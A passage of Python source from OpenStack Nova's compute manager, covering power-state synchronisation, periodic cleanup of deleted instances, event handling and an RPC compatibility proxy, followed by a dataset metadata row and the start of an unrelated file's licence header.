vm_power_state = vm_instance.state
except exception.InstanceNotFound:
vm_power_state = power_state.NOSTATE
# Note(maoy): the above get_info call might take a long time,
# for example, because of a broken libvirt driver.
try:
self._sync_instance_power_state(context,
db_instance,
vm_power_state,
use_slave=True)
except exception.InstanceNotFound:
# NOTE(hanlind): If the instance gets deleted during sync,
# silently ignore.
pass
def _sync_instance_power_state(self, context, db_instance, vm_power_state,
use_slave=False):
"""Align instance power state between the database and hypervisor.
If the instance is not found on the hypervisor, but is in the database,
then a stop() API will be called on the instance.
"""
# We re-query the DB to get the latest instance info to minimize
# (not eliminate) race condition.
db_instance.refresh(use_slave=use_slave)
db_power_state = db_instance.power_state
vm_state = db_instance.vm_state
if self.host != db_instance.host:
# on the sending end of nova-compute _sync_power_state
# may have yielded to the greenthread performing a live
# migration; this in turn has changed the resident-host
# for the VM; However, the instance is still active, it
# is just in the process of migrating to another host.
# This implies that the compute source must relinquish
# control to the compute destination.
LOG.info("During the sync_power process the "
"instance has moved from "
"host %(src)s to host %(dst)s",
{'src': db_instance.host,
'dst': self.host},
instance=db_instance)
return
elif db_instance.task_state is not None:
# on the receiving end of nova-compute, it could happen
            # that the DB instance already reports the new resident host
            # but the actual VM has not shown up on the hypervisor
# yet. In this case, let's allow the loop to continue
# and run the state sync in a later round
LOG.info("During sync_power_state the instance has a "
"pending task (%(task)s). Skip.",
{'task': db_instance.task_state},
instance=db_instance)
return
orig_db_power_state = db_power_state
if vm_power_state != db_power_state:
LOG.info('During _sync_instance_power_state the DB '
'power_state (%(db_power_state)s) does not match '
'the vm_power_state from the hypervisor '
'(%(vm_power_state)s). Updating power_state in the '
'DB to match the hypervisor.',
{'db_power_state': db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
# power_state is always updated from hypervisor to db
db_instance.power_state = vm_power_state
db_instance.save()
db_power_state = vm_power_state
# Note(maoy): Now resolve the discrepancy between vm_state and
# vm_power_state. We go through all possible vm_states.
if vm_state in (vm_states.BUILDING,
vm_states.RESCUED,
vm_states.RESIZED,
vm_states.ERROR):
# TODO(maoy): we ignore these vm_state for now.
pass
elif vm_state == vm_states.SUSPENDED:
if not CONF.sync_power_state_unexpected_call_stop:
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning("Instance shutdown by itself. "
"Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s",
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
                    db_instance.vm_state = vm_states.STOPPED
db_instance.save()
elif vm_power_state == power_state.RUNNING:
LOG.warning("Instance started running by itself. "
"Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s",
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
                    db_instance.vm_state = vm_states.ACTIVE
db_instance.save()
elif vm_state == vm_states.ACTIVE:
# The only rational power state should be RUNNING
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
if CONF.sync_power_state_unexpected_call_stop:
LOG.warning("Instance shutdown by itself. Calling the "
"stop API. Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s",
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
try:
# Note(maoy): here we call the API instead of
# brutally updating the vm_state in the database
# to allow all the hooks and checks to be performed.
if db_instance.shutdown_terminate:
self.compute_api.delete(context, db_instance)
else:
self.compute_api.stop(context, db_instance)
except Exception:
# Note(maoy): there is no need to propagate the error
# because the same power_state will be retrieved next
# time and retried.
# For example, there might be another task scheduled.
msg = "error during stop() in sync_power_state."
LOG.exception(msg, instance=db_instance)
else:
LOG.warning("Instance shutdown by itself. Not calling the "
"stop API. Action disabled by config. "
"Hypervisor-HA will take care. "
"Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s",
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
db_instance.vm_state = vm_states.STOPPED
db_instance.save()
elif vm_power_state == power_state.SUSPENDED:
if CONF.sync_power_state_unexpected_call_stop:
LOG.warning("Instance is suspended unexpectedly. Calling "
"the stop API.", instance=db_instance)
try:
self.compute_api.stop(context, db_instance)
except Exception:
msg = "error during stop() in sync_power_state."
LOG.exception(msg, instance=db_instance)
else:
LOG.warning("Instance is suspended unexpectedly. Not "
"calling the stop API. Action disabled via by "
"config.", instance=db_instance)
db_instance.vm_state = vm_states.SUSPENDED
db_instance.save()
elif vm_power_state == power_state.PAUSED:
# Note(maoy): a VM may get into the paused state not only
# because the user request via API calls, but also
# due to (temporary) external instrumentations.
# Before the virt layer can reliably report the reason,
# we simply ignore the state discrepancy. In many cases,
# the VM state will go back to running after the external
# instrumentation is done. See bug 1097806 for details.
LOG.warning("Instance is paused unexpectedly. Ignore.",
instance=db_instance)
elif vm_power_state == power_state.NOSTATE:
# Occasionally, depending on the status of the hypervisor,
# which could be restarting for example, an instance may
# not be found. Therefore just log the condition.
LOG.warning("Instance is unexpectedly not found. Ignore.",
instance=db_instance)
elif vm_state == vm_states.STOPPED:
if vm_power_state not in (power_state.NOSTATE,
power_state.SHUTDOWN,
power_state.CRASHED):
if CONF.sync_power_state_unexpected_call_stop:
LOG.warning("Instance is not stopped. Calling "
"the stop API. Current vm_state: %(vm_state)s,"
" current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s",
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
try:
# NOTE(russellb) Force the stop, because normally the
# compute API would not allow an attempt to stop a
# stopped instance.
self.compute_api.force_stop(context, db_instance)
except Exception:
msg = "error during stop() in sync_power_state."
LOG.exception(msg, instance=db_instance)
else:
LOG.warning("Instance shutdown by itself. Not calling the "
"stop API. Action disabled by config. "
"Hypervisor-HA will take care. "
"Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s",
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
db_instance.vm_state = vm_states.ACTIVE
db_instance.save()
elif vm_state == vm_states.PAUSED:
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
if CONF.sync_power_state_unexpected_call_stop:
LOG.warning("Paused instance shutdown by itself. Calling "
"the stop API.", instance=db_instance)
try:
self.compute_api.force_stop(context, db_instance)
except Exception:
msg = "error during stop() in sync_power_state."
LOG.exception(msg, instance=db_instance)
else:
LOG.warning("Paused instance shutdown by itself. Not "
"calling stop API. Action disabled by config.",
instance=db_instance)
db_instance.vm_state = vm_states.STOPPED
db_instance.save()
elif vm_state in (vm_states.SOFT_DELETED,
vm_states.DELETED):
if vm_power_state not in (power_state.NOSTATE,
power_state.SHUTDOWN):
# Note(maoy): this should be taken care of periodically in
# _cleanup_running_deleted_instances().
LOG.warning("Instance is not (soft-)deleted.",
instance=db_instance)
@periodic_task.periodic_task
def _reclaim_queued_deletes(self, context):
"""Reclaim instances that are queued for deletion."""
interval = CONF.reclaim_instance_interval
if interval <= 0:
LOG.debug("CONF.reclaim_instance_interval <= 0, skipping...")
return
filters = {'vm_state': vm_states.SOFT_DELETED,
'task_state': None,
'host': self.host}
instances = objects.InstanceList.get_by_filters(
context, filters,
expected_attrs=objects.instance.INSTANCE_DEFAULT_FIELDS,
use_slave=True)
for instance in instances:
if self._deleted_old_enough(instance, interval):
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
LOG.info('Reclaiming deleted instance', instance=instance)
try:
self._delete_instance(context, instance, bdms)
except Exception as e:
LOG.warning("Periodic reclaim failed to delete "
"instance: %s",
e, instance=instance)
def _get_nodename(self, instance, refresh=False):
"""Helper method to get the name of the first available node
on this host. This method should not be used with any operations
on ironic instances since it does not handle multiple nodes.
"""
node = self.driver.get_available_nodes(refresh=refresh)[0]
LOG.debug("No node specified, defaulting to %s", node,
instance=instance)
return node
def update_available_resource_for_node(self, context, nodename):
rt = self._get_resource_tracker()
try:
rt.update_available_resource(context, nodename)
except exception.ComputeHostNotFound:
# NOTE(comstud): We can get to this case if a node was
# marked 'deleted' in the DB and then re-added with a
# different auto-increment id. The cached resource
# tracker tried to update a deleted record and failed.
# Don't add this resource tracker to the new dict, so
# that this will resolve itself on the next run.
LOG.info("Compute node '%s' not found in "
"update_available_resource.", nodename)
# TODO(jaypipes): Yes, this is inefficient to throw away all of the
# compute nodes to force a rebuild, but this is only temporary
# until Ironic baremetal node resource providers are tracked
# properly in the report client and this is a tiny edge case
# anyway.
self._resource_tracker = None
return
except Exception:
LOG.exception("Error updating resources for node %(node)s.",
{'node': nodename})
@periodic_task.periodic_task(spacing=CONF.update_resources_interval)
def update_available_resource(self, context, startup=False):
"""See driver.get_available_resource()
        Periodic process that keeps the compute host's understanding of
resource availability and usage in sync with the underlying hypervisor.
:param context: security context
:param startup: True if this is being called when the nova-compute
service is starting, False otherwise.
"""
compute_nodes_in_db = self._get_compute_nodes_in_db(context,
use_slave=True,
startup=startup)
try:
nodenames = set(self.driver.get_available_nodes())
except exception.VirtDriverNotReady:
LOG.warning("Virt driver is not ready.")
return
for nodename in nodenames:
self.update_available_resource_for_node(context, nodename)
        # Delete orphan compute nodes not reported by the driver but still in the DB
for cn in compute_nodes_in_db:
if cn.hypervisor_hostname not in nodenames:
LOG.info("Deleting orphan compute node %(id)s "
"hypervisor host is %(hh)s, "
"nodes are %(nodes)s",
{'id': cn.id, 'hh': cn.hypervisor_hostname,
'nodes': nodenames})
cn.destroy()
# Delete the corresponding resource provider in placement,
# along with any associated allocations and inventory.
# TODO(cdent): Move use of reportclient into resource tracker.
self.scheduler_client.reportclient.delete_resource_provider(
context, cn, cascade=True)
def _get_compute_nodes_in_db(self, context, use_slave=False,
startup=False):
try:
return objects.ComputeNodeList.get_all_by_host(context, self.host,
use_slave=use_slave)
except exception.NotFound:
if startup:
LOG.warning(
"No compute node record found for host %s. If this is "
"the first time this service is starting on this "
"host, then you can ignore this warning.", self.host)
else:
LOG.error("No compute node record for host %s", self.host)
return []
@periodic_task.periodic_task(
spacing=CONF.running_deleted_instance_poll_interval)
def _cleanup_running_deleted_instances(self, context):
"""Cleanup any instances which are erroneously still running after
having been deleted.
Valid actions to take are:
1. noop - do nothing
2. log - log which instances are erroneously running
3. reap - shutdown and cleanup any erroneously running instances
4. shutdown - power off *and disable* any erroneously running
instances
The use-case for this cleanup task is: for various reasons, it may be
possible for the database to show an instance as deleted but for that
instance to still be running on a host machine (see bug
https://bugs.launchpad.net/nova/+bug/911366).
This cleanup task is a cross-hypervisor utility for finding these
zombied instances and either logging the discrepancy (likely what you
should do in production), or automatically reaping the instances (more
appropriate for dev environments).
"""
action = CONF.running_deleted_instance_action
if action == "noop":
return
# NOTE(sirp): admin contexts don't ordinarily return deleted records
with utils.temporary_mutation(context, read_deleted="yes"):
for instance in self._running_deleted_instances(context):
if action == "log":
LOG.warning("Detected instance with name label "
"'%s' which is marked as "
"DELETED but still present on host.",
instance.name, instance=instance)
elif action == 'shutdown':
LOG.info("Powering off instance with name label "
"'%s' which is marked as "
"DELETED but still present on host.",
instance.name, instance=instance)
try:
try:
# disable starting the instance
self.driver.set_bootable(instance, False)
except NotImplementedError:
LOG.debug("set_bootable is not implemented "
"for the current driver")
# and power it off
self.driver.power_off(instance)
except Exception:
LOG.warning("Failed to power off instance",
instance=instance, exc_info=True)
elif action == 'reap':
LOG.info("Destroying instance with name label "
"'%s' which is marked as "
"DELETED but still present on host.",
instance.name, instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid, use_slave=True)
self.instance_events.clear_events_for_instance(instance)
try:
self._shutdown_instance(context, instance, bdms,
notify=False)
self._cleanup_volumes(context, instance, bdms)
except Exception as e:
LOG.warning("Periodic cleanup failed to delete "
"instance: %s",
e, instance=instance)
else:
raise Exception(_("Unrecognized value '%s'"
" for CONF.running_deleted_"
"instance_action") % action)
def _running_deleted_instances(self, context):
"""Returns a list of instances nova thinks is deleted,
but the hypervisor thinks is still running.
"""
timeout = CONF.running_deleted_instance_timeout
filters = {'deleted': True,
'soft_deleted': False}
instances = self._get_instances_on_driver(context, filters)
return [i for i in instances if self._deleted_old_enough(i, timeout)]
def _deleted_old_enough(self, instance, timeout):
deleted_at = instance.deleted_at
if deleted_at:
deleted_at = deleted_at.replace(tzinfo=None)
return (not deleted_at or timeutils.is_older_than(deleted_at, timeout))
@contextlib.contextmanager
def _error_out_instance_on_exception(self, context, instance,
instance_state=vm_states.ACTIVE):
instance_uuid = instance.uuid
try:
yield
except NotImplementedError as error:
with excutils.save_and_reraise_exception():
LOG.info("Setting instance back to %(state)s after: "
"%(error)s",
{'state': instance_state, 'error': error},
instance_uuid=instance_uuid)
self._instance_update(context, instance,
vm_state=instance_state,
task_state=None)
except exception.InstanceFaultRollback as error:
LOG.info("Setting instance back to ACTIVE after: %s",
error, instance_uuid=instance_uuid)
self._instance_update(context, instance,
vm_state=vm_states.ACTIVE,
task_state=None)
raise error.inner_exception
except Exception:
LOG.exception('Setting instance vm_state to ERROR',
instance_uuid=instance_uuid)
with excutils.save_and_reraise_exception():
self._set_instance_obj_error_state(context, instance)
@wrap_exception()
def add_aggregate_host(self, context, aggregate, host, slave_info):
"""Notify hypervisor of change (for hypervisor pools)."""
try:
self.driver.add_to_aggregate(context, aggregate, host,
slave_info=slave_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'add_aggregate_host')
except exception.AggregateError:
with excutils.save_and_reraise_exception():
self.driver.undo_aggregate_operation(
context,
aggregate.delete_host,
aggregate, host)
@wrap_exception()
def remove_aggregate_host(self, context, host, slave_info, aggregate):
"""Removes a host from a physical hypervisor pool."""
try:
self.driver.remove_from_aggregate(context, aggregate, host,
slave_info=slave_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'remove_aggregate_host')
except (exception.AggregateError,
exception.InvalidAggregateAction) as e:
with excutils.save_and_reraise_exception():
self.driver.undo_aggregate_operation(
context,
aggregate.add_host,
aggregate, host,
isinstance(e, exception.AggregateError))
def _process_instance_event(self, instance, event):
_event = self.instance_events.pop_instance_event(instance, event)
if _event:
LOG.debug('Processing event %(event)s',
{'event': event.key}, instance=instance)
_event.send(event)
else:
# If it's a network-vif-unplugged event and the instance is being
# deleted then we don't need to make this a warning as it's
# expected. There are other things which could trigger this like
# detaching an interface, but we don't have a task state for that.
if (event.name == 'network-vif-unplugged' and
instance.task_state == task_states.DELETING):
LOG.debug('Received event %s for instance which is being '
'deleted.', event.key, instance=instance)
else:
LOG.warning('Received unexpected event %(event)s for '
'instance with vm_state %(vm_state)s and '
'task_state %(task_state)s.',
{'event': event.key,
'vm_state': instance.vm_state,
'task_state': instance.task_state},
instance=instance)
def _process_instance_vif_deleted_event(self, context, instance,
deleted_vif_id):
        # If an attached port is deleted by neutron, it needs to
        # be detached from the instance, and the info cache needs
        # to be updated.
network_info = instance.info_cache.network_info
for index, vif in enumerate(network_info):
if vif['id'] == deleted_vif_id:
LOG.info('Neutron deleted interface %(intf)s; '
'detaching it from the instance and '
'deleting it from the info cache',
{'intf': vif['id']},
instance=instance)
del network_info[index]
base_net_api.update_instance_cache_with_nw_info(
self.network_api, context,
instance,
nw_info=network_info)
try:
self.driver.detach_interface(context, instance, vif)
except NotImplementedError:
# Not all virt drivers support attach/detach of interfaces
# yet (like Ironic), so just ignore this.
pass
except exception.NovaException as ex:
LOG.warning("Detach interface failed, "
"port_id=%(port_id)s, reason: %(msg)s",
{'port_id': deleted_vif_id, 'msg': ex},
instance=instance)
break
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def extend_volume(self, context, instance, extended_volume_id):
        # If an attached volume is extended by cinder, it needs to
        # be extended by the virt driver so the host can detect its
        # new size, and the BDM needs to be updated.
LOG.debug('Handling volume-extended event for volume %(vol)s',
{'vol': extended_volume_id}, instance=instance)
try:
bdm = objects.BlockDeviceMapping.get_by_volume_and_instance(
context, extended_volume_id, instance.uuid)
except exception.NotFound:
LOG.warning('Extend volume failed, '
'volume %(vol)s is not attached to instance.',
{'vol': extended_volume_id},
instance=instance)
return
LOG.info('Cinder extended volume %(vol)s; '
'extending it to detect new size',
{'vol': extended_volume_id},
instance=instance)
volume = self.volume_api.get(context, bdm.volume_id)
if bdm.connection_info is None:
LOG.warning('Extend volume failed, '
'attached volume %(vol)s has no connection_info',
{'vol': extended_volume_id},
instance=instance)
return
connection_info = jsonutils.loads(bdm.connection_info)
bdm.volume_size = volume['size']
bdm.save()
if not self.driver.capabilities.get('supports_extend_volume', False):
raise exception.ExtendVolumeNotSupported()
try:
self.driver.extend_volume(connection_info,
instance)
except Exception as ex:
LOG.warning('Extend volume failed, '
'volume_id=%(volume_id)s, reason: %(msg)s',
{'volume_id': extended_volume_id, 'msg': ex},
instance=instance)
raise
@wrap_exception()
def external_instance_event(self, context, instances, events):
# NOTE(danms): Some event types are handled by the manager, such
# as when we're asked to update the instance's info_cache. If it's
# not one of those, look for some thread(s) waiting for the event and
# unblock them if so.
for event in events:
instance = [inst for inst in instances
if inst.uuid == event.instance_uuid][0]
LOG.debug('Received event %(event)s',
{'event': event.key},
instance=instance)
if event.name == 'network-changed':
try:
LOG.debug('Refreshing instance network info cache due to '
'event %s.', event.key, instance=instance)
self.network_api.get_instance_nw_info(
context, instance, refresh_vif_id=event.tag)
except exception.NotFound as e:
LOG.info('Failed to process external instance event '
'%(event)s due to: %(error)s',
{'event': event.key, 'error': six.text_type(e)},
instance=instance)
elif event.name == 'network-vif-deleted':
try:
self._process_instance_vif_deleted_event(context,
instance,
event.tag)
except exception.NotFound as e:
LOG.info('Failed to process external instance event '
'%(event)s due to: %(error)s',
{'event': event.key, 'error': six.text_type(e)},
instance=instance)
elif event.name == 'volume-extended':
self.extend_volume(context, instance, event.tag)
else:
self._process_instance_event(instance, event)
@periodic_task.periodic_task(spacing=CONF.image_cache_manager_interval,
external_process_ok=True)
def _run_image_cache_manager_pass(self, context):
"""Run a single pass of the image cache manager."""
if not self.driver.capabilities["has_imagecache"]:
return
# Determine what other nodes use this storage
storage_users.register_storage_use(CONF.instances_path, CONF.host)
nodes = storage_users.get_storage_users(CONF.instances_path)
# Filter all_instances to only include those nodes which share this
# storage path.
# TODO(mikal): this should be further refactored so that the cache
# cleanup code doesn't know what those instances are, just a remote
# count, and then this logic should be pushed up the stack.
filters = {'deleted': False,
'soft_deleted': True,
'host': nodes}
filtered_instances = objects.InstanceList.get_by_filters(context,
filters, expected_attrs=[], use_slave=True)
self.driver.manage_image_cache(context, filtered_instances)
@periodic_task.periodic_task(spacing=CONF.instance_delete_interval)
def _run_pending_deletes(self, context):
"""Retry any pending instance file deletes."""
LOG.debug('Cleaning up deleted instances')
filters = {'deleted': True,
'soft_deleted': False,
'host': CONF.host,
'cleaned': False}
attrs = ['system_metadata']
with utils.temporary_mutation(context, read_deleted='yes'):
instances = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=attrs, use_slave=True)
LOG.debug('There are %d instances to clean', len(instances))
# TODO(raj_singh): Remove this if condition when min value is
# introduced to "maximum_instance_delete_attempts" cfg option.
if CONF.maximum_instance_delete_attempts < 1:
LOG.warning('Future versions of Nova will restrict the '
'"maximum_instance_delete_attempts" config option '
'to values >=1. Update your configuration file to '
'mitigate future upgrade issues.')
for instance in instances:
attempts = int(instance.system_metadata.get('clean_attempts', '0'))
LOG.debug('Instance has had %(attempts)s of %(max)s '
'cleanup attempts',
{'attempts': attempts,
'max': CONF.maximum_instance_delete_attempts},
instance=instance)
if attempts < CONF.maximum_instance_delete_attempts:
success = self.driver.delete_instance_files(instance)
instance.system_metadata['clean_attempts'] = str(attempts + 1)
if success:
instance.cleaned = True
with utils.temporary_mutation(context, read_deleted='yes'):
instance.save()
@periodic_task.periodic_task(spacing=CONF.instance_delete_interval)
def _cleanup_incomplete_migrations(self, context):
"""Delete instance files on failed resize/revert-resize operation
        During a resize/revert-resize operation, if the instance gets deleted
        in between, its files might remain on either the source or the
        destination compute node because of a race condition.
"""
LOG.debug('Cleaning up deleted instances with incomplete migration ')
migration_filters = {'host': CONF.host,
'status': 'error'}
migrations = objects.MigrationList.get_by_filters(context,
migration_filters)
if not migrations:
return
inst_uuid_from_migrations = set([migration.instance_uuid for migration
in migrations])
inst_filters = {'deleted': True, 'soft_deleted': False,
'uuid': inst_uuid_from_migrations}
attrs = ['info_cache', 'security_groups', 'system_metadata']
with utils.temporary_mutation(context, read_deleted='yes'):
instances = objects.InstanceList.get_by_filters(
context, inst_filters, expected_attrs=attrs, use_slave=True)
for instance in instances:
if instance.host != CONF.host:
for migration in migrations:
if instance.uuid == migration.instance_uuid:
                        # Delete instance files if they were not cleaned up
                        # properly on either the source or destination compute
                        # node when the instance was deleted during resizing.
self.driver.delete_instance_files(instance)
try:
migration.status = 'failed'
with migration.obj_as_admin():
migration.save()
except exception.MigrationNotFound:
LOG.warning("Migration %s is not found.",
migration.id,
instance=instance)
break
@messaging.expected_exceptions(exception.InstanceQuiesceNotSupported,
exception.QemuGuestAgentNotEnabled,
exception.NovaException,
NotImplementedError)
@wrap_exception()
def quiesce_instance(self, context, instance):
"""Quiesce an instance on this host."""
context = context.elevated()
image_meta = objects.ImageMeta.from_instance(instance)
self.driver.quiesce(context, instance, image_meta)
def _wait_for_snapshots_completion(self, context, mapping):
for mapping_dict in mapping:
if mapping_dict.get('source_type') == 'snapshot':
def _wait_snapshot():
snapshot = self.volume_api.get_snapshot(
context, mapping_dict['snapshot_id'])
if snapshot.get('status') != 'creating':
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_snapshot)
timer.start(interval=0.5).wait()
@messaging.expected_exceptions(exception.InstanceQuiesceNotSupported,
exception.QemuGuestAgentNotEnabled,
exception.NovaException,
NotImplementedError)
@wrap_exception()
def unquiesce_instance(self, context, instance, mapping=None):
"""Unquiesce an instance on this host.
If snapshots' image mapping is provided, it waits until snapshots are
        completed before unquiescing.
"""
context = context.elevated()
if mapping:
try:
self._wait_for_snapshots_completion(context, mapping)
except Exception as error:
LOG.exception("Exception while waiting completion of "
"volume snapshots: %s",
error, instance=instance)
image_meta = objects.ImageMeta.from_instance(instance)
self.driver.unquiesce(context, instance, image_meta)
# NOTE(danms): This proxy object provides a 4.x interface for received RPC
# calls so we are compatible with 5.0 (above) and 4.22 from <=Queens. This
# should be removed in Rocky when we drop 4.x support.
class _ComputeV4Proxy(object):
target = messaging.Target(version='4.22')
def __init__(self, manager):
self.manager = manager
def __getattr__(self, name):
# NOTE(danms): Anything not called out below is straight-through
return getattr(self.manager, name)
def attach_interface(self, context, instance, network_id, port_id,
requested_ip, tag=None):
return self.manager.attach_interface(context, instance, network_id,
port_id, requested_ip, tag)
def check_can_live_migrate_source(self, ctxt, instance, dest_check_data):
# TODO(tdurakov): remove dict to object conversion once RPC API version
# is bumped to 5.x
got_migrate_data_object = isinstance(dest_check_data,
migrate_data_obj.LiveMigrateData)
if not got_migrate_data_object:
dest_check_data = \
migrate_data_obj.LiveMigrateData.detect_implementation(
dest_check_data)
result = self.manager.check_can_live_migrate_source(ctxt, instance,
dest_check_data)
if not got_migrate_data_object:
result = result.to_legacy_dict()
return result
def detach_volume(self, context, volume_id, instance, attachment_id=None):
return self.manager.detach_volume(context, volume_id, instance,
attachment_id)
def finish_resize(self, context, disk_info, image, instance, reservations,
migration):
return self.manager.finish_resize(context, disk_info, image, instance,
migration)
def finish_revert_resize(self, context, instance, reservations, migration):
return self.manager.finish_revert_resize(context, instance, migration)
def live_migration(self, context, dest, instance, block_migration,
migration, migrate_data):
got_migrate_data_object = isinstance(migrate_data,
migrate_data_obj.LiveMigrateData)
if not got_migrate_data_object:
migrate_data = \
migrate_data_obj.LiveMigrateData.detect_implementation(
migrate_data)
return self.manager.live_migration(context, dest, instance,
block_migration, migration,
migrate_data)
def live_migration_force_complete(self, context, instance,
migration_id=None):
self.manager.live_migration_force_complete(context, instance)
def pre_live_migration(self, context, instance, block_migration, disk,
migrate_data):
# TODO(tdurakov): remove dict to object conversion once RPC API version
# is bumped to 5.x
got_migrate_data_object = isinstance(migrate_data,
migrate_data_obj.LiveMigrateData)
if not got_migrate_data_object:
migrate_data = \
migrate_data_obj.LiveMigrateData.detect_implementation(
migrate_data)
migrate_data = self.manager.pre_live_migration(context, instance,
block_migration, disk,
migrate_data)
# TODO(tdurakov): remove dict to object conversion once RPC API version
# is bumped to 5.x
if not got_migrate_data_object and migrate_data:
migrate_data = migrate_data.to_legacy_dict(
pre_migration_result=True)
migrate_data = migrate_data['pre_live_migration_result']
return migrate_data
def prep_resize(self, context, image, instance, instance_type,
reservations, request_spec, filter_properties, node,
clean_shutdown, migration=None, host_list=None):
# NOTE(melwitt): Remove this in version 5.0 of the RPC API
# Code downstream may expect extra_specs to be populated since it
# is receiving an object, so lookup the flavor to ensure this.
if not isinstance(instance_type, objects.Flavor):
instance_type = objects.Flavor.get_by_id(context,
instance_type['id'])
return self.manager.prep_resize(context, image, instance,
instance_type,
request_spec, filter_properties,
node, clean_shutdown,
migration, host_list)
def rebuild_instance(self, context, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage=None,
preserve_ephemeral=False, migration=None,
scheduled_node=None, limits=None, request_spec=None):
# FIXME(danms): Can remove handling for on_shared_storage below this
# point or does the API need it for compatibility?
return self.manager.rebuild_instance(context, instance, orig_image_ref,
image_ref, injected_files,
new_pass, orig_sys_metadata,
bdms, recreate,
on_shared_storage,
preserve_ephemeral,
migration,
scheduled_node, limits,
request_spec)
def resize_instance(self, context, instance, image, reservations,
migration, instance_type, clean_shutdown):
# TODO(chaochin) Remove this until v5 RPC API
# Code downstream may expect extra_specs to be populated since it
# is receiving an object, so lookup the flavor to ensure this.
if (not instance_type or
not isinstance(instance_type, objects.Flavor)):
instance_type = objects.Flavor.get_by_id(
context, migration['new_instance_type_id'])
return self.manager.resize_instance(context, instance, image,
migration, instance_type,
clean_shutdown)
def rollback_live_migration_at_destination(self, context, instance,
destroy_disks, migrate_data):
# TODO(tdurakov): remove dict to object conversion once RPC API
# version is bumped to 5.x
if isinstance(migrate_data, dict):
migrate_data = \
migrate_data_obj.LiveMigrateData.detect_implementation(
migrate_data)
return self.manager.rollback_live_migration_at_destination(
context, instance, destroy_disks, migrate_data)
def swap_volume(self, context, old_volume_id, new_volume_id, instance,
new_attachment_id=None):
return self.manager.swap_volume(context, old_volume_id, new_volume_id,
instance, new_attachment_id)
def reserve_block_device_name(self, context, instance, device, volume_id,
disk_bus, device_type, tag=None,
multiattach=False):
return self.manager.reserve_block_device_name(context, instance,
device, volume_id,
disk_bus, device_type,
tag, multiattach)
def terminate_instance(self, context, instance, bdms, reservations):
return self.manager.terminate_instance(context, instance, bdms)
def soft_delete_instance(self, context, instance, reservations):
return self.manager.soft_delete_instance(context, instance)
@object_compat
def refresh_instance_security_rules(self, context, instance):
return self.manager.refresh_instance_security_rules(context, instance)
# NOTE(hanlind): This and the virt method it calls can be removed in
# version 5.0 of the RPC API
@wrap_exception()
def refresh_security_group_rules(self, context, security_group_id):
"""Tell the virtualization driver to refresh security group rules.
Passes straight through to the virtualization driver.
"""
return self.manager.driver.refresh_security_group_rules(
security_group_id)
@object_compat
def get_instance_diagnostics(self, context, instance):
return self.manager.get_instance_diagnostics(context, instance)
def confirm_resize(self, context, instance, reservations, migration):
return self.manager.confirm_resize(context, instance, migration)
def revert_resize(self, context, instance, migration, reservations):
return self.manager.revert_resize(context, instance, migration)
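# Illustrative sketch only (not called anywhere): the decision that
# ComputeManager._sync_instance_power_state makes for an instance whose DB
# vm_state is ACTIVE, reduced to a pure function over the already-imported
# power_state constants. The real method also logs, saves the instance and,
# for the 'stop' outcome, calls the compute API (delete when
# shutdown_terminate is set, stop otherwise).
def _sketch_sync_action_for_active(vm_power_state, call_stop_enabled):
    if vm_power_state in (power_state.SHUTDOWN, power_state.CRASHED):
        return 'stop' if call_stop_enabled else 'mark vm_state STOPPED'
    if vm_power_state == power_state.SUSPENDED:
        return 'stop' if call_stop_enabled else 'mark vm_state SUSPENDED'
    if vm_power_state in (power_state.PAUSED, power_state.NOSTATE):
        return 'ignore'
    return 'in sync'  # e.g. RUNNING already matches ACTIVE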
| 48.001342 | 79 | 0.59046 |
4a1e3b77278c5b95b991a9d6df99b3b643fd65e0 | 2,288 | py | Python | epyc/scope.py | auscompgeek/perfectgift | 1c49a628ad17da151dfa9bfac7b3be857c143920 | [
"MIT"
] | 2 | 2016-12-11T21:58:13.000Z | 2018-01-31T02:43:48.000Z | epyc/scope.py | auscompgeek/perfectgift | 1c49a628ad17da151dfa9bfac7b3be857c143920 | [
"MIT"
] | null | null | null | epyc/scope.py | auscompgeek/perfectgift | 1c49a628ad17da151dfa9bfac7b3be857c143920 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# epyc: python-like templating language (Embedded PYthon Code)
# Copyright (C) 2014 Cyphar
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
